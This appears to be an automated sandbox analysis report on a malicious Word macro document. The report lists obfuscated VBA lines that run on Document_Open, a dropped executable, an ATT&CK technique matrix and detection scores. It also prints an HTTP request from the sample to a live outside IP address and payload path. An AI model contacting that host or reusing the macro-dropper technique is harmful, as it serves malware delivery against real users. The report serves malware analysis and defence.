Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://powerlift.acompli.net
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://roaming.edog.
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://settings.outlook.com
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://shell.suite.office.com:1443
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://staging.cortana.ai
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://store.office.de/addinstemplate
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://tasks.office.com
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://webshell.suite.office.com
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://wus2.contentsync.
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://wus2.pagecontentsync.
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drString found in binary or memory: https://www.odwebp.svc.ms
Source: global trafficHTTP traffic detected: GET /fhfty/82PF9MOX9VRXL73GMCXOFE8AGP5ROGT8/rm HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 45.8.146.139Connection: Keep-Alive

System Summary

barindex
Source: Screenshot number: 8Screenshot OCR: Enable editing" button on the top bar, and then click "Enable content". W L 'd"" - '0 - a" 4 At-
Source: Screenshot number: 8Screenshot OCR: Enable content". W L 'd"" - '0 - a" 4 At- B I y " " A, " ;Z 'tyles ,uaM "" " Page1 of 1 30 wo
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\rECA2.tmp.exeJump to dropped file
Source: airequipmentcorp-doc-08.11.2022.docOLE, VBA macro line: Private Declare PtrSafe Function Lib "kernel32" Alias "VirtualProtect" (ByVal As LongPtr, ByVal As LongPtr, ByVal As LongPtr, As LongPtr) As LongPtr
Source: airequipmentcorp-doc-08.11.2022.docOLE, VBA macro line: Set = CallByName((ufVM1s65i("AzhECiJUk2")), ufVM1s65i("bYZwWl"), VbGet, ufVM1s65i("cR3qp4Grta"))
Source: airequipmentcorp-doc-08.11.2022.docOLE, VBA macro line: Set = CallByName((), ufVM1s65i("QaSy54aHeh"), VbGet, )
Source: airequipmentcorp-doc-08.11.2022.docOLE, VBA macro line: Set = CallByName((), ufVM1s65i("NZpkQxhY7T"), VbGet, )
Source: ~DF32F8B01FD4175FF7.TMP.0.drOLE, VBA macro line: Private Declare PtrSafe Function Lib "kernel32" Alias "VirtualProtect" (ByVal As LongPtr, ByVal As LongPtr, ByVal As LongPtr, As LongPtr) As LongPtr
Source: ~DF32F8B01FD4175FF7.TMP.0.drOLE, VBA macro line: Set = CallByName((ufVM1s65i("AzhECiJUk2")), ufVM1s65i("bYZwWl"), VbGet, ufVM1s65i("cR3qp4Grta"))
Source: ~DF32F8B01FD4175FF7.TMP.0.drOLE, VBA macro line: Set = CallByName((), ufVM1s65i("QaSy54aHeh"), VbGet, )
Source: ~DF32F8B01FD4175FF7.TMP.0.drOLE, VBA macro line: Set = CallByName((), ufVM1s65i("NZpkQxhY7T"), VbGet, )
Source: C:\Users\user\AppData\Local\Temp\rECA2.tmp.exeCode function: 2_2_01004C9B
Source: airequipmentcorp-doc-08.11.2022.docOLE, VBA macro line: Private Sub Document_Open()
Source: ~DF32F8B01FD4175FF7.TMP.0.drOLE, VBA macro line: Private Sub Document_Open()
Source: C:\Users\user\AppData\Local\Temp\rECA2.tmp.exeCode function: 2_2_01003F00 NtQuerySystemInformation,
Source: C:\Users\user\AppData\Local\Temp\rECA2.tmp.exeCode function: 2_2_01005D14 NtOpenProcessToken,RtlNtStatusToDosError,NtClose,QueryActCtxW,NtOpenProcessToken,NtSetInformationToken,NtClose,
Source: C:\Users\user\AppData\Local\Temp\rECA2.tmp.exeCode function: 2_2_01003F9E HeapSetInformation,NtSetInformationProcess,AttachConsole,LocalAlloc,LoadLibraryExW,GetProcAddress,SetErrorMode,FreeLibrary,LocalFree,DeactivateActCtx,ReleaseActCtx,FreeLibrary,LocalFree,FreeConsole,ExitProcess,
Source: C:\Users\user\AppData\Local\Temp\rECA2.tmp.exeCode function: 2_2_01005C96 NtQueryInformationToken,NtQueryInformationToken,RtlNtStatusToDosError,
Source: ~DF32F8B01FD4175FF7.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: rECA2.tmp.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: rECA2.tmp.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: rECA2.tmp.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmi.dll
Source: airequipmentcorp-doc-08.11.2022.docOLE indicator, VBA macros: true
Source: ~DF32F8B01FD4175FF7.TMP.0.drOLE indicator, VBA macros: true
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\rECA2.tmp.exe 4E15AA13A02798E924C63537E458A09415C48DAE0E7AFD5A3D25532A2AA935EE
Source: airequipmentcorp-doc-08.11.2022.docVirustotal: Detection: 24%
Source: airequipmentcorp-doc-08.11.2022.docReversingLabs: Detection: 15%
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Users\user\AppData\Local\Temp\rECA2.tmp.exe "C:\Users\user\AppData\Local\Temp\rECA2.tmp.exe" "C:\Users\user\AppData\Local\Temp\yE9E2.tmp.dll",#1
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Users\user\AppData\Local\Temp\rECA2.tmp.exe "C:\Users\user\AppData\Local\Temp\rECA2.tmp.exe" "C:\Users\user\AppData\Local\Temp\yE9E2.tmp.dll",#1
Source: airequipmentcorp-doc-08.11.2022.doc.LNK.0.drLNK file: ..\..\..\..\..\Desktop\airequipmentcorp-doc-08.11.2022.doc
Source: airequipmentcorp-doc-08.11.2022.docOLE indicator, Word Document stream: true
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.WordJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{AE3085A9-7AA4-45D1-A34F-1D0E8511FD2C} - OProcSessId.datJump to behavior
Source: classification engineClassification label: mal92.expl.winDOC@4/14@0/1
Source: C:\Users\user\AppData\Local\Temp\rECA2.tmp.exeCode function: 2_2_01003590 SHSetThreadRef,CoCreateInstance,SHSetThreadRef,
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\AppData\Local\Temp\rECA2.tmp.exeCode function: 2_2_01003A94 LoadLibraryExW,GetLastError,FormatMessageW,RtlImageNtHeader,SetProcessMitigationPolicy,
Source: C:\Users\user\AppData\Local\Temp\rECA2.tmp.exeCommand line argument: WLDP.DLL
Source: C:\Users\user\AppData\Local\Temp\rECA2.tmp.exeCommand line argument: localserver
Source: airequipmentcorp-doc-08.11.2022.docOLE document summary: title field not present or empty
Source: airequipmentcorp-doc-08.11.2022.docOLE document summary: author field not present or empty
Source: airequipmentcorp-doc-08.11.2022.docOLE document summary: edited time not present or 0
Source: ~DF32F8B01FD4175FF7.TMP.0.drOLE document summary: title field not present or empty
Source: ~DF32F8B01FD4175FF7.TMP.0.drOLE document summary: author field not present or empty
Source: ~DF32F8B01FD4175FF7.TMP.0.drOLE document summary: edited time not present or 0
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: airequipmentcorp-doc-08.11.2022.docInitial sample: OLE zip file path = docProps/custom.xml
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: airequipmentcorp-doc-08.11.2022.docStatic file information: File size 2297841 > 1048576
Source: Binary string: rundll32.pdb source: rECA2.tmp.exe, rECA2.tmp.exe, 00000002.00000000.272138035.0000000001001000.00000020.00000001.01000000.00000003.sdmp, rECA2.tmp.exe.0.dr
Source: Binary string: rundll32.pdbGCTL source: rECA2.tmp.exe, 00000002.00000000.272138035.0000000001001000.00000020.00000001.01000000.00000003.sdmp, rECA2.tmp.exe.0.dr
Source: C:\Users\user\AppData\Local\Temp\rECA2.tmp.exeCode function: 2_2_01006989 push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\rECA2.tmp.exeCode function: 2_2_010068E0 push ecx; ret
Source: rECA2.tmp.exe.0.drStatic PE information: section name: .didat
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\rECA2.tmp.exeJump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\rECA2.tmp.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WmiPrvSE.exeFile opened / queried: scsi#disk&ven_vmware&prod_virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Windows\System32\wbem\WmiPrvSE.exeFile opened: PHYSICALDRIVE0
Source: C:\Users\user\AppData\Local\Temp\rECA2.tmp.exeCode function: 2_2_01002512 GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW,
Source: C:\Users\user\AppData\Local\Temp\rECA2.tmp.exeCode function: 2_2_01002D7A GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
Source: C:\Users\user\AppData\Local\Temp\rECA2.tmp.exeCode function: 2_2_01003D9F mov esi, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\rECA2.tmp.exeCode function: 2_2_01006580 SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\rECA2.tmp.exeCode function: 2_2_01006232 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\rECA2.tmp.exeCode function: 2_2_01006783 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts2
Command and Scripting Interpreter
1
DLL Side-Loading
1
Process Injection
1
Masquerading
OS Credential Dumping1
System Time Discovery
Remote Services1
Archive Collected Data
Exfiltration Over Other Network Medium1
Encrypted Channel
Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default Accounts12
Scripting
Boot or Logon Initialization Scripts1
DLL Side-Loading
1
Disable or Modify Tools
LSASS Memory4
Security Software Discovery
Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
Ingress Tool Transfer
Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain Accounts42
Exploitation for Client Execution
Logon Script (Windows)1
Extra Window Memory Injection
2
Virtualization/Sandbox Evasion
Security Account Manager2
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
Non-Application Layer Protocol
Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
Process Injection
NTDS1
File and Directory Discovery
Distributed Component Object ModelInput CaptureScheduled Transfer11
Application Layer Protocol
SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script12
Scripting
LSA Secrets13
System Information Discovery
SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.common1
Obfuscated Files or Information
Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup Items1
DLL Side-Loading
DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
Extra Window Memory Injection
Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
airequipmentcorp-doc-08.11.2022.doc25%VirustotalBrowse
airequipmentcorp-doc-08.11.2022.doc15%ReversingLabsScript-Macro.Trojan.Amphitryon
airequipmentcorp-doc-08.11.2022.doc100%Joe Sandbox ML
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\~DF32F8B01FD4175FF7.TMP100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\rECA2.tmp.exe0%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\rECA2.tmp.exe0%ReversingLabs
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://roaming.edog.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
http://45.8.146.139/fhfty/82PF9MOX9VRXL73GMCXOFE8AGP5ROGT8/rm0%Avira URL Cloudsafe
https://api.aadrm.com/0%URL Reputationsafe
https://ofcrecsvcapi-int.azurewebsites.net/0%URL Reputationsafe
https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h0%Avira URL Cloudsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://officeci.azurewebsites.net/api/0%URL Reputationsafe
https://my.microsoftpersonalcontent.com0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://api.aadrm.com0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://api.addins.store.officeppe.com/addinstemplate0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
